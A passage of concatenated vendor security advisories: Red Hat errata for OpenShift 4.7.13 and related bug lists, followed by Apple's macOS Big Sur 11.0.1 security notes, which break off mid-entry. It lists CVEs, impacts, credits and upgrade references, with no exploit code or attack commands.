1967890) 3. Bugs fixed (https://bugzilla.redhat.com/): 1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms 1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string 1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data 1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7 1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory 1954506 - [DDF] Table does not contain data about 20 clusters. Now it's difficult to estimate CPU usage with larger clusters 1954535 - Reinstall Submariner - No endpoints found on one cluster 1955270 - ACM Operator should support using the default route TLS 1956852 - The scrolling bar for search filter does not work properly 1957254 - RHACM 2.2.4 images 1959426 - Limits on Length of MultiClusterObservability Resource Name 1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM. 1963128 - [DDF] Please rename this to "Amazon Elastic Kubernetes Service" 1966513 - Unable to make SSH connection to a Bitbucket server 1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error. 1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message 5. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: OpenShift Container Platform 4.7.13 bug fix and security update Advisory ID: RHSA-2021:2121-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2021:2121 Issue date: 2021-06-01 CVE Names: CVE-2016-10228 CVE-2019-2708 CVE-2019-3842 CVE-2019-9169 CVE-2019-13012 CVE-2019-14866 CVE-2019-18811 CVE-2019-19523 CVE-2019-19528 CVE-2019-25013 CVE-2019-25032 CVE-2019-25034 CVE-2019-25035 CVE-2019-25036 CVE-2019-25037 CVE-2019-25038 CVE-2019-25039 CVE-2019-25040 CVE-2019-25041 CVE-2019-25042 CVE-2020-0431 CVE-2020-8231 CVE-2020-8284 CVE-2020-8285 CVE-2020-8286 CVE-2020-8927 CVE-2020-9948 CVE-2020-9951 CVE-2020-9983 CVE-2020-10543 CVE-2020-10878 CVE-2020-11608 CVE-2020-12114 CVE-2020-12362 CVE-2020-12464 CVE-2020-13434 CVE-2020-13543 CVE-2020-13584 CVE-2020-13776 CVE-2020-14314 CVE-2020-14344 CVE-2020-14345 CVE-2020-14346 CVE-2020-14347 CVE-2020-14356 CVE-2020-14360 CVE-2020-14361 CVE-2020-14362 CVE-2020-14363 CVE-2020-15358 CVE-2020-15437 CVE-2020-15586 CVE-2020-16845 CVE-2020-24330 CVE-2020-24331 CVE-2020-24332 CVE-2020-24394 CVE-2020-24977 CVE-2020-25212 CVE-2020-25284 CVE-2020-25285 CVE-2020-25643 CVE-2020-25659 CVE-2020-25704 CVE-2020-25712 CVE-2020-26116 CVE-2020-26137 CVE-2020-27618 CVE-2020-27619 CVE-2020-27783 CVE-2020-27786 CVE-2020-27835 CVE-2020-28196 CVE-2020-28935 CVE-2020-28974 CVE-2020-29361 CVE-2020-29362 CVE-2020-29363 CVE-2020-35508 CVE-2020-36242 CVE-2020-36322 CVE-2021-0342 CVE-2021-3121 CVE-2021-3177 CVE-2021-3326 CVE-2021-21642 CVE-2021-21643 CVE-2021-21644 CVE-2021-21645 CVE-2021-23336 CVE-2021-25215 CVE-2021-30465 ===================================================================== 1. Summary: Red Hat OpenShift Container Platform release 4.7.13 is now available with updates to packages and images that fix several bugs. This release includes a security update for Red Hat OpenShift Container Platform 4.7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Description: Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.13. See the following advisory for the RPM packages for this release: https://access.redhat.com/errata/RHSA-2021:2122 Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes: https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html This update fixes the following bug among others: * Previously, resources for the ClusterOperator were being created early in the update process, which led to update failures when the ClusterOperator had no status condition while Operators were updating. This bug fix changes the timing of when these resources are created. As a result, updates can take place without errors. (BZ#1959238) Security Fix(es): * gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121) You may download the oc tool and use it to inspect release image metadata as follows: (For x86_64 architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-x86_64 The image digest is sha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4 (For s390x architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-s390x The image digest is sha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd (For ppc64le architecture) $ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le The image digest is sha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36 All OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor 3. Solution: For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update: https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html 4. Bugs fixed (https://bugzilla.redhat.com/): 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1923268 - [Assisted-4.7] [Staging] Using two both spelling "canceled" "cancelled" 1947216 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go 1953963 - Enable/Disable host operations returns cluster resource with incomplete hosts list 1957749 - ovn-kubernetes pod should have CPU and memory requests set but not limits 1959238 - CVO creating cloud-controller-manager too early causing upgrade failures 1960103 - SR-IOV obliviously reboot the node 1961941 - Local Storage Operator using LocalVolume CR fails to create PV's when backend storage failure is simulated 1962302 - packageserver clusteroperator does not set reason or message for Available condition 1962312 - Deployment considered unhealthy despite being available and at latest generation 1962435 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone 1963115 - Test verify /run filesystem contents failing 5. References: https://access.redhat.com/security/cve/CVE-2016-10228 https://access.redhat.com/security/cve/CVE-2019-2708 https://access.redhat.com/security/cve/CVE-2019-3842 https://access.redhat.com/security/cve/CVE-2019-9169 https://access.redhat.com/security/cve/CVE-2019-13012 https://access.redhat.com/security/cve/CVE-2019-14866 https://access.redhat.com/security/cve/CVE-2019-18811 https://access.redhat.com/security/cve/CVE-2019-19523 https://access.redhat.com/security/cve/CVE-2019-19528 https://access.redhat.com/security/cve/CVE-2019-25013 https://access.redhat.com/security/cve/CVE-2019-25032 https://access.redhat.com/security/cve/CVE-2019-25034 https://access.redhat.com/security/cve/CVE-2019-25035 https://access.redhat.com/security/cve/CVE-2019-25036 https://access.redhat.com/security/cve/CVE-2019-25037 https://access.redhat.com/security/cve/CVE-2019-25038 https://access.redhat.com/security/cve/CVE-2019-25039 https://access.redhat.com/security/cve/CVE-2019-25040 https://access.redhat.com/security/cve/CVE-2019-25041 https://access.redhat.com/security/cve/CVE-2019-25042 https://access.redhat.com/security/cve/CVE-2020-0431 https://access.redhat.com/security/cve/CVE-2020-8231 https://access.redhat.com/security/cve/CVE-2020-8284 https://access.redhat.com/security/cve/CVE-2020-8285 https://access.redhat.com/security/cve/CVE-2020-8286 https://access.redhat.com/security/cve/CVE-2020-8927 https://access.redhat.com/security/cve/CVE-2020-9948 https://access.redhat.com/security/cve/CVE-2020-9951 https://access.redhat.com/security/cve/CVE-2020-9983 https://access.redhat.com/security/cve/CVE-2020-10543 https://access.redhat.com/security/cve/CVE-2020-10878 https://access.redhat.com/security/cve/CVE-2020-11608 https://access.redhat.com/security/cve/CVE-2020-12114 https://access.redhat.com/security/cve/CVE-2020-12362 https://access.redhat.com/security/cve/CVE-2020-12464 https://access.redhat.com/security/cve/CVE-2020-13434 https://access.redhat.com/security/cve/CVE-2020-13543 https://access.redhat.com/security/cve/CVE-2020-13584 https://access.redhat.com/security/cve/CVE-2020-13776 https://access.redhat.com/security/cve/CVE-2020-14314 https://access.redhat.com/security/cve/CVE-2020-14344 https://access.redhat.com/security/cve/CVE-2020-14345 https://access.redhat.com/security/cve/CVE-2020-14346 https://access.redhat.com/security/cve/CVE-2020-14347 https://access.redhat.com/security/cve/CVE-2020-14356 https://access.redhat.com/security/cve/CVE-2020-14360 https://access.redhat.com/security/cve/CVE-2020-14361 https://access.redhat.com/security/cve/CVE-2020-14362 https://access.redhat.com/security/cve/CVE-2020-14363 https://access.redhat.com/security/cve/CVE-2020-15358 https://access.redhat.com/security/cve/CVE-2020-15437 https://access.redhat.com/security/cve/CVE-2020-15586 https://access.redhat.com/security/cve/CVE-2020-16845 https://access.redhat.com/security/cve/CVE-2020-24330 https://access.redhat.com/security/cve/CVE-2020-24331 https://access.redhat.com/security/cve/CVE-2020-24332 https://access.redhat.com/security/cve/CVE-2020-24394 https://access.redhat.com/security/cve/CVE-2020-24977 https://access.redhat.com/security/cve/CVE-2020-25212 https://access.redhat.com/security/cve/CVE-2020-25284 https://access.redhat.com/security/cve/CVE-2020-25285 https://access.redhat.com/security/cve/CVE-2020-25643 https://access.redhat.com/security/cve/CVE-2020-25659 https://access.redhat.com/security/cve/CVE-2020-25704 https://access.redhat.com/security/cve/CVE-2020-25712 https://access.redhat.com/security/cve/CVE-2020-26116 https://access.redhat.com/security/cve/CVE-2020-26137 https://access.redhat.com/security/cve/CVE-2020-27618 https://access.redhat.com/security/cve/CVE-2020-27619 https://access.redhat.com/security/cve/CVE-2020-27783 https://access.redhat.com/security/cve/CVE-2020-27786 https://access.redhat.com/security/cve/CVE-2020-27835 https://access.redhat.com/security/cve/CVE-2020-28196 https://access.redhat.com/security/cve/CVE-2020-28935 https://access.redhat.com/security/cve/CVE-2020-28974 https://access.redhat.com/security/cve/CVE-2020-29361 https://access.redhat.com/security/cve/CVE-2020-29362 https://access.redhat.com/security/cve/CVE-2020-29363 https://access.redhat.com/security/cve/CVE-2020-35508 https://access.redhat.com/security/cve/CVE-2020-36242 https://access.redhat.com/security/cve/CVE-2020-36322 https://access.redhat.com/security/cve/CVE-2021-0342 https://access.redhat.com/security/cve/CVE-2021-3121 https://access.redhat.com/security/cve/CVE-2021-3177 https://access.redhat.com/security/cve/CVE-2021-3326 https://access.redhat.com/security/cve/CVE-2021-21642 https://access.redhat.com/security/cve/CVE-2021-21643 https://access.redhat.com/security/cve/CVE-2021-21644 https://access.redhat.com/security/cve/CVE-2021-21645 https://access.redhat.com/security/cve/CVE-2021-23336 https://access.redhat.com/security/cve/CVE-2021-25215 https://access.redhat.com/security/cve/CVE-2021-30465 https://access.redhat.com/security/updates/classification/#moderate 6. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2021 Red Hat, Inc. Bugs fixed (https://bugzilla.redhat.com/): 1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve 1945703 - "Guest OS Info" availability in VMI describe is flaky 1958816 - [2.6.z] KubeMacPool fails to start due to OOM likely caused by a high number of Pods running in the cluster 1963275 - migration controller null pointer dereference 1965099 - Live Migration double handoff to virt-handler causes connection failures 1965181 - CDI importer doesn't report AwaitingVDDK like it used to 1967086 - Cloning DataVolumes between namespaces fails while creating cdi-upload pod 1967887 - [2.6.6] nmstate is not progressing on a node and not configuring vlan filtering that causes an outage for VMs 1969756 - Windows VMs fail to start on air-gapped environments 1970372 - Virt-handler fails to verify container-disk 1973227 - segfault in virt-controller during pdb deletion 1974084 - 2.6.6 containers 1975212 - No Virtual Machine Templates Found [EDIT - all templates are marked as depracted] 1975727 - [Regression][VMIO][Warm] The third precopy does not end in warm migration 1977756 - [2.6.z] PVC keeps in pending when using hostpath-provisioner 1982760 - [v2v] no kind VirtualMachine is registered for version \"kubevirt.io/v1\" i... 1986989 - OpenShift Virtualization 2.6.z cannot be upgraded to 4.8.0 initially deployed starting with <= 4.8 5. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2020-12-14-4 Additional information for APPLE-SA-2020-11-13-1 macOS Big Sur 11.0.1 macOS Big Sur 11.0.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT211931. AMD Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2020-27914: Yu Wang of Didi Research America CVE-2020-27915: Yu Wang of Didi Research America Entry added December 14, 2020 App Store Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to gain elevated privileges Description: This issue was addressed by removing the vulnerable code. CVE-2020-27903: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab Audio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-27910: JunDong Xie and XingWei Lin of Ant Security Light- Year Lab Audio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-27916: JunDong Xie of Ant Security Light-Year Lab Audio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-9943: JunDong Xie of Ant Group Light-Year Security Lab Audio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-9944: JunDong Xie of Ant Group Light-Year Security Lab Bluetooth Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause unexpected application termination or heap corruption Description: Multiple integer overflows were addressed with improved input validation. CVE-2020-27906: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab CoreAudio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-27908: JunDong Xie and XingWei Lin of Ant Security Light- Year Lab CVE-2020-27909: Anonymous working with Trend Micro Zero Day Initiative, JunDong Xie and XingWei Lin of Ant Security Light-Year Lab CVE-2020-9960: JunDong Xie and XingWei Lin of Ant Security Light-Year Lab Entry added December 14, 2020 CoreAudio Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-10017: Francis working with Trend Micro Zero Day Initiative, JunDong Xie of Ant Security Light-Year Lab CoreCapture Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-9949: Proteas CoreGraphics Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-9883: an anonymous researcher, Mickey Jin of Trend Micro Crash Reporter Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local attacker may be able to elevate their privileges Description: An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. CVE-2020-10003: Tim Michaud (@TimGMichaud) of Leviathan CoreText Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A logic issue was addressed with improved state management. CVE-2020-27922: Mickey Jin of Trend Micro Entry added December 14, 2020 CoreText Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted text file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2020-9999: Apple Entry updated December 14, 2020 Disk Images Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-9965: Proteas CVE-2020-9966: Proteas Finder Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Users may be unable to remove metadata indicating where files were downloaded from Description: The issue was addressed with additional user controls. CVE-2020-27894: Manuel Trezza of Shuggr (shuggr.com) FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: A buffer overflow was addressed with improved size validation. CVE-2020-9962: Yiğit Can YILMAZ (@yilmazcanyigit) Entry added December 14, 2020 FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-27952: an anonymous researcher, Mickey Jin and Junzhi Lu of Trend Micro Entry added December 14, 2020 FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-9956: Mickey Jin and Junzhi Lu of Trend Micro Mobile Security Research Team working with Trend Micro’s Zero Day Initiative Entry added December 14, 2020 FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed with improved input validation. CVE-2020-27931: Apple Entry added December 14, 2020 FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font may lead to arbitrary code execution. Apple is aware of reports that an exploit for this issue exists in the wild. Description: A memory corruption issue was addressed with improved input validation. CVE-2020-27930: Google Project Zero FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-27927: Xingwei Lin of Ant Security Light-Year Lab Foundation Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local user may be able to read arbitrary files Description: A logic issue was addressed with improved state management. CVE-2020-10002: James Hutchins HomeKit Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An attacker in a privileged network position may be able to unexpectedly alter application state Description: This issue was addressed with improved setting propagation. CVE-2020-9978: Luyi Xing, Dongfang Zhao, and Xiaofeng Wang of Indiana University Bloomington, Yan Jia of Xidian University and University of Chinese Academy of Sciences, and Bin Yuan of HuaZhong University of Science and Technology Entry added December 14, 2020 ImageIO Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-9955: Mickey Jin of Trend Micro, Xingwei Lin of Ant Security Light-Year Lab Entry added December 14, 2020 ImageIO Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-27924: Lei Sun Entry added December 14, 2020 ImageIO Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-27912: Xingwei Lin of Ant Security Light-Year Lab CVE-2020-27923: Lei Sun Entry updated December 14, 2020 ImageIO Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-9876: Mickey Jin of Trend Micro Intel Graphics Driver Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-10015: ABC Research s.r.o. working with Trend Micro Zero Day Initiative CVE-2020-27897: Xiaolong Bai and Min (Spark) Zheng of Alibaba Inc., and Luyi Xing of Indiana University Bloomington Entry added December 14, 2020 Intel Graphics Driver Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2020-27907: ABC Research s.r.o. working with Trend Micro Zero Day Initiative Entry added December 14, 2020 Image Processing Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-27919: Hou JingYi (@hjy79425575) of Qihoo 360 CERT, Xingwei Lin of Ant Security Light-Year Lab Entry added December 14, 2020 Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory Description: Multiple memory corruption issues were addressed with improved input validation. CVE-2020-9967: Alex Plaskett (@alexjplaskett) Entry added December 14, 2020 Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-9975: Tielei Wang of Pangu Lab Entry added December 14, 2020 Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2020-27921: Linus Henze (pinauten.de) Entry added December 14, 2020 Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A logic issue existed resulting in memory corruption. This was addressed with improved state management. CVE-2020-27904: Zuozhi Fan (@pattern_F_) of Ant Group Tianqong Security Lab Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An attacker in a privileged network position may be able to inject into active connections within a VPN tunnel Description: A routing issue was addressed with improved restrictions. CVE-2019-14899: William J. Tolley, Beau Kujath, and Jedidiah R. Crandall Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to disclose kernel memory. Apple is aware of reports that an exploit for this issue exists in the wild. Description: A memory initialization issue was addressed. CVE-2020-27950: Google Project Zero Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to determine kernel memory layout Description: A logic issue was addressed with improved state management. CVE-2020-9974: Tommy Muir (@Muirey03) Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2020-10016: Alex Helie Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of reports that an exploit for this issue exists in the wild. Description: A type confusion issue was addressed with improved state handling. CVE-2020-27932: Google Project Zero libxml2 Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing maliciously crafted web content may lead to code execution Description: A use after free issue was addressed with improved memory management. CVE-2020-27917: found by OSS-Fuzz CVE-2020-27920: found by OSS-Fuzz Entry updated December 14, 2020 libxml2 Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: An integer overflow was addressed through improved input validation. CVE-2020-27911: found by OSS-Fuzz libxpc Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to elevate privileges Description: A logic issue was addressed with improved validation. CVE-2020-9971: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab Entry added December 14, 2020 libxpc Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to break out of its sandbox Description: A parsing issue in the handling of directory paths was addressed with improved path validation. CVE-2020-10014: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab Logging Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local attacker may be able to elevate their privileges Description: A path handling issue was addressed with improved validation. CVE-2020-10010: Tommy Muir (@Muirey03) Mail Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A 